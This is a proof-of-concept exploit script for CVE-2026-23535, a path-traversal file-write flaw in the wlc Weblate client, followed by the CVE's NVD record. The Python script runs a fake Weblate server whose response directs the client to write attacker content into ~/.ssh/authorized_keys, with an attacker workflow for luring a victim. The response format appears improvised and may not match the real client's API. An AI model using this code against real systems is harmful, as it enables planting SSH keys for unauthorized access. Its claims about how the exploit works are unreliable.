CVE-2026-23535

# CVE-2026-23535 PoC - Malicious Weblate Server Simulation # This PoC demonstrates how a malicious server can instruct wlc client to write to arbitrary locations import json from http.server import HTTPServer, BaseHTTPRequestHandler class MaliciousWlcHandler(BaseHTTPRequestHandler): def do_GET(self): if '/api/translations/' in self.path: # Craft malicious response to trigger arbitrary file write # The server specifies an arbitrary path in the response malicious_response = { 'unit': { 'translation': { 'component': { 'slug': 'test-component' } } }, # Specify arbitrary file path to write '_file_path': '/home/user/.ssh/authorized_keys', 'target': 'malicious SSH key content\n' } self.send_response(200) self.send_header('Content-Type', 'application/json') self.end_headers() self.wfile.write(json.dumps(malicious_response).encode()) def log_message(self, format, *args): print(f'[Malicious Server] {args[0]}') def main(): server = HTTPServer(('0.0.0.0', 8443), MaliciousWlcHandler) print('[+] Malicious Weblate server running on port 8443') print('[+] When wlc client connects and downloads translations,') print('[+] it will write to the path specified by the server') server.serve_forever() if __name__ == '__main__': main() # Attacker workflow: # 1. Set up malicious Weblate server on port 8443 # 2. Wait for victim to connect: wlc --url http://attacker:8443 # 3. Victim runs: wlc download --all # 4. Client writes to arbitrary path specified by attacker

{"cve": {"id": "CVE-2026-23535", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:19.407", "lastModified": "2026-02-18T16:26:25.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.2, the multi-translation download could write to an arbitrary location when instructed by a crafted server. This vulnerability is fixed in 1.17.2."}, {"lang": "es", "value": "wlc es un cliente de línea de comandos de Weblate que utiliza la API REST de Weblate. Antes de la versión 1.17.2, la descarga de múltiples traducciones podría escribir en una ubicación arbitraria cuando era instruida por un servidor malicioso. Esta vulnerabilidad está corregida en la versión 1.17.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:weblate:wlc:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.2", "matchCriteriaId": "FE9E9EAB-FA37-452C-8726-AC707E423550"}]}]}], "references": [{"url": "https://github.com/WeblateOrg/wlc/commit/216e691c6e50abae97fe2e4e4f21501bf49a585f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WeblateOrg/wlc/pull/1128", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/WeblateOrg/wlc/releases/tag/1.17.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/WeblateOrg/wlc/security/advisories/GHSA-mmwx-79f6-67jg", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory", "Mitigation"]}]}}